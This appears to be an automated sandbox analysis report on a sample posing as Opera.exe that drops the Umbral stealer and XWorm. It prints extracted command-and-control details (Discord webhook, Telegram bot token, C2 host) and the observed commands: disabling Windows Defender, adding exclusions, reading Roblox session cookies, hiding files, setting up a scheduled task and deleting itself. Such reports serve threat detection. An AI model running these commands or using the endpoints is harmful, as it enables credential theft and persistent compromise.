Analysis
-
max time kernel
110s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
26-04-2024 13:15
General
-
Target
Opera.exe
-
Size
319KB
-
MD5
f69924b642ac4b9ef1dfacdfd43759a9
-
SHA1
95da50564c7cbc3749148419c68a08b0f2869ee1
-
SHA256
d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18
-
SHA512
2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07
-
SSDEEP
6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2
Extracted
xworm
phentermine-partial.gl.at.ply.gg:36969
-
Install_directory
%AppData%
-
install_file
Client.exe
-
telegram
https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x000900000001aaff-5.dat family_umbral behavioral1/memory/4500-10-0x0000027C630E0000-0x0000027C63120000-memory.dmp family_umbral behavioral1/memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp family_umbral -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000800000001abe7-9.dat family_xworm behavioral1/memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp family_xworm behavioral1/memory/4472-12-0x0000000000FC0000-0x0000000000FDA000-memory.dmp family_xworm -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral3.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk XClient.exe -
Executes dropped EXE 4 IoCs
pid Process 4500 Umbral3.exe 4472 XClient.exe 4716 Client.exe 3372 Client.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2480 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 220 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4460 PING.EXE -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1420 powershell.exe 1420 powershell.exe 1420 powershell.exe 2932 powershell.exe 2932 powershell.exe 2932 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 4224 powershell.exe 4224 powershell.exe 4224 powershell.exe 4580 powershell.exe 4580 powershell.exe 4580 powershell.exe 4472 XClient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4472 XClient.exe Token: SeDebugPrivilege 4500 Umbral3.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeIncreaseQuotaPrivilege 1420 powershell.exe Token: SeSecurityPrivilege 1420 powershell.exe Token: SeTakeOwnershipPrivilege 1420 powershell.exe Token: SeLoadDriverPrivilege 1420 powershell.exe Token: SeSystemProfilePrivilege 1420 powershell.exe Token: SeSystemtimePrivilege 1420 powershell.exe Token: SeProfSingleProcessPrivilege 1420 powershell.exe Token: SeIncBasePriorityPrivilege 1420 powershell.exe Token: SeCreatePagefilePrivilege 1420 powershell.exe Token: SeBackupPrivilege 1420 powershell.exe Token: SeRestorePrivilege 1420 powershell.exe Token: SeShutdownPrivilege 1420 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeSystemEnvironmentPrivilege 1420 powershell.exe Token: SeRemoteShutdownPrivilege 1420 powershell.exe Token: SeUndockPrivilege 1420 powershell.exe Token: SeManageVolumePrivilege 1420 powershell.exe Token: 33 1420 powershell.exe Token: 34 1420 powershell.exe Token: 35 1420 powershell.exe Token: 36 1420 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeIncreaseQuotaPrivilege 4204 powershell.exe Token: SeSecurityPrivilege 4204 powershell.exe Token: SeTakeOwnershipPrivilege 4204 powershell.exe Token: SeLoadDriverPrivilege 4204 powershell.exe Token: SeSystemProfilePrivilege 4204 powershell.exe Token: SeSystemtimePrivilege 4204 powershell.exe Token: SeProfSingleProcessPrivilege 4204 powershell.exe Token: SeIncBasePriorityPrivilege 4204 powershell.exe Token: SeCreatePagefilePrivilege 4204 powershell.exe Token: SeBackupPrivilege 4204 powershell.exe Token: SeRestorePrivilege 4204 powershell.exe Token: SeShutdownPrivilege 4204 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeSystemEnvironmentPrivilege 4204 powershell.exe Token: SeRemoteShutdownPrivilege 4204 powershell.exe Token: SeUndockPrivilege 4204 powershell.exe Token: SeManageVolumePrivilege 4204 powershell.exe Token: 33 4204 powershell.exe Token: 34 4204 powershell.exe Token: 35 4204 powershell.exe Token: 36 4204 powershell.exe Token: SeIncreaseQuotaPrivilege 668 wmic.exe Token: SeSecurityPrivilege 668 wmic.exe Token: SeTakeOwnershipPrivilege 668 wmic.exe Token: SeLoadDriverPrivilege 668 wmic.exe Token: SeSystemProfilePrivilege 668 wmic.exe Token: SeSystemtimePrivilege 668 wmic.exe Token: SeProfSingleProcessPrivilege 668 wmic.exe Token: SeIncBasePriorityPrivilege 668 wmic.exe Token: SeCreatePagefilePrivilege 668 wmic.exe Token: SeBackupPrivilege 668 wmic.exe Token: SeRestorePrivilege 668 wmic.exe Token: SeShutdownPrivilege 668 wmic.exe Token: SeDebugPrivilege 668 wmic.exe Token: SeSystemEnvironmentPrivilege 668 wmic.exe Token: SeRemoteShutdownPrivilege 668 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4472 XClient.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 2660 wrote to memory of 4500 2660 Opera.exe 73 PID 2660 wrote to memory of 4500 2660 Opera.exe 73 PID 2660 wrote to memory of 4472 2660 Opera.exe 74 PID 2660 wrote to memory of 4472 2660 Opera.exe 74 PID 4500 wrote to memory of 4476 4500 Umbral3.exe 75 PID 4500 wrote to memory of 4476 4500 Umbral3.exe 75 PID 4500 wrote to memory of 1420 4500 Umbral3.exe 77 PID 4500 wrote to memory of 1420 4500 Umbral3.exe 77 PID 4500 wrote to memory of 2932 4500 Umbral3.exe 80 PID 4500 wrote to memory of 2932 4500 Umbral3.exe 80 PID 4500 wrote to memory of 5028 4500 Umbral3.exe 83 PID 4500 wrote to memory of 5028 4500 Umbral3.exe 83 PID 4500 wrote to memory of 5072 4500 Umbral3.exe 85 PID 4500 wrote to memory of 5072 4500 Umbral3.exe 85 PID 4472 wrote to memory of 4204 4472 XClient.exe 87 PID 4472 wrote to memory of 4204 4472 XClient.exe 87 PID 4500 wrote to memory of 668 4500 Umbral3.exe 89 PID 4500 wrote to memory of 668 4500 Umbral3.exe 89 PID 4472 wrote to memory of 436 4472 XClient.exe 91 PID 4472 wrote to memory of 436 4472 XClient.exe 91 PID 4500 wrote to memory of 2220 4500 Umbral3.exe 93 PID 4500 wrote to memory of 2220 4500 Umbral3.exe 93 PID 4500 wrote to memory of 2992 4500 Umbral3.exe 95 PID 4500 wrote to memory of 2992 4500 Umbral3.exe 95 PID 4500 wrote to memory of 1752 4500 Umbral3.exe 97 PID 4500 wrote to memory of 1752 4500 Umbral3.exe 97 PID 4472 wrote to memory of 4224 4472 XClient.exe 99 PID 4472 wrote to memory of 4224 4472 XClient.exe 99 PID 4500 wrote to memory of 220 4500 Umbral3.exe 101 PID 4500 wrote to memory of 220 4500 Umbral3.exe 101 PID 4472 wrote to memory of 4580 4472 XClient.exe 103 PID 4472 wrote to memory of 4580 4472 XClient.exe 103 PID 4500 wrote to memory of 2880 4500 Umbral3.exe 105 PID 4500 wrote to memory of 2880 4500 Umbral3.exe 105 PID 2880 wrote to memory of 4460 2880 cmd.exe 107 PID 2880 wrote to memory of 4460 2880 cmd.exe 107 PID 4472 wrote to memory of 2480 4472 XClient.exe 108 PID 4472 wrote to memory of 2480 4472 XClient.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4476 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Opera.exe"C:\Users\Admin\AppData\Local\Temp\Opera.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"3⤵
- Views/modifies file attributes
PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2220
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:220
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"3⤵
- Creates scheduled task(s)
PID:2480
-
-
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:4716
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:3372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5338afe10d2e89a4c0a45c948e9d9ea42
SHA1ad20bc0297e2dc6280e669ec76ac12959257d67e
SHA2561ad3d40487ace460cfca036ecfdba4b73fa2bf2db557d4f58e0748aa0ac3faac
SHA512c1e46ed28976586f6f5186237488c14517335595610c7eda6e53e956b645cef5894eeb436f8a25f54c4389ff553457090c770626e991e40688e7c3248fde43a2
-
Filesize
1KB
MD50b7ea66ebb4eca91e4794e6bc19c9a4a
SHA1897f3586ecafe37072ea7786d4f25c359c8060ae
SHA256607d7ac7291760fa591c46d11eff9f8510cafca50df9bf434a913fd0fa3a9cda
SHA51232dff1aaf2519e1b4ac0f82d12037be4d1e1074c6dd0b6c4d41435541235523e7b7cba2bde62caaea576fc902f92275cb3100912b42db3d0cb69a0fe4ff308d1
-
Filesize
1KB
MD56092470e6488d081f6ada7ae02ba571b
SHA180d148a208cb1cb0b3f86cab0cff663ad9897366
SHA256a49dd75579b0c24ee1a87736a81394ff575006db5e21b4278f7eb157e65ce712
SHA51285d91e254e98e5f393c7d9f258f3b963fbb79d4048f532a949ae69a715464de85588141ca256af0b0b4c175186fa036b2251ae73bbcaa2fec6333321392c2a57
-
Filesize
1KB
MD53c2e48a34dbfbe7f8f175c9aeab9ccb8
SHA18ce17bd98159c3d0aec462ef21a308c4883003ef
SHA256a0ba4fa76f5e68b5cc16cd268a43fe2f989587742f6157de0ff7ef230632390b
SHA51243d5f9c1bda988ad4db7b4265ffdea57374ecf3f4fb04642f95720237a110b8aaec34bd133506f17511829c28bac0880571bd64cacb4e15905c1108ea272f0ac
-
Filesize
1KB
MD562b4d6a1cae7e82266a3ae89ed95ebbf
SHA1a6852adeafef92bfedc6f9916945366d7549d2a2
SHA2569a8238ac7dfb77498b9dcb5b08cef4dde1eea0e6dbfda95a35c1f2cfe846c82a
SHA512349cd192536e46f8f3aa08ac1f21fdfc72b16830030ff6fb56209022d8264eeef456f4a68769e4be2b25695fc708218b9edd2fe4fe54aae5473f22927e6884c9
-
Filesize
1KB
MD556fa67efa74c34191150ad3843de0dda
SHA1cfa2905dba6ff57d4cf56d505714a2de10c1e19a
SHA25603be8e43f5f7c434365a47890b01245814d2ccc6a3963ca664283c27e60fbde5
SHA51257e721f275fda8947f4ad91dcc131a5a6482e61efcd623a618f1bcde4b79f6b43558070b2cd477eb1841d0f5de19334613e79204be126c2940cd4e5a911df877
-
Filesize
229KB
MD57a902c87a60986f18a6b097712299256
SHA12c01906a39faa9d27a41e0d3cd84e92410b9c483
SHA256e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5
SHA512c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6
-
Filesize
80KB
MD53fc932775533f1bcea180de679a902dd
SHA13f393d02af4653e34bf5526ec5b6f8d6e4df65e8
SHA25609a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a
SHA512f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a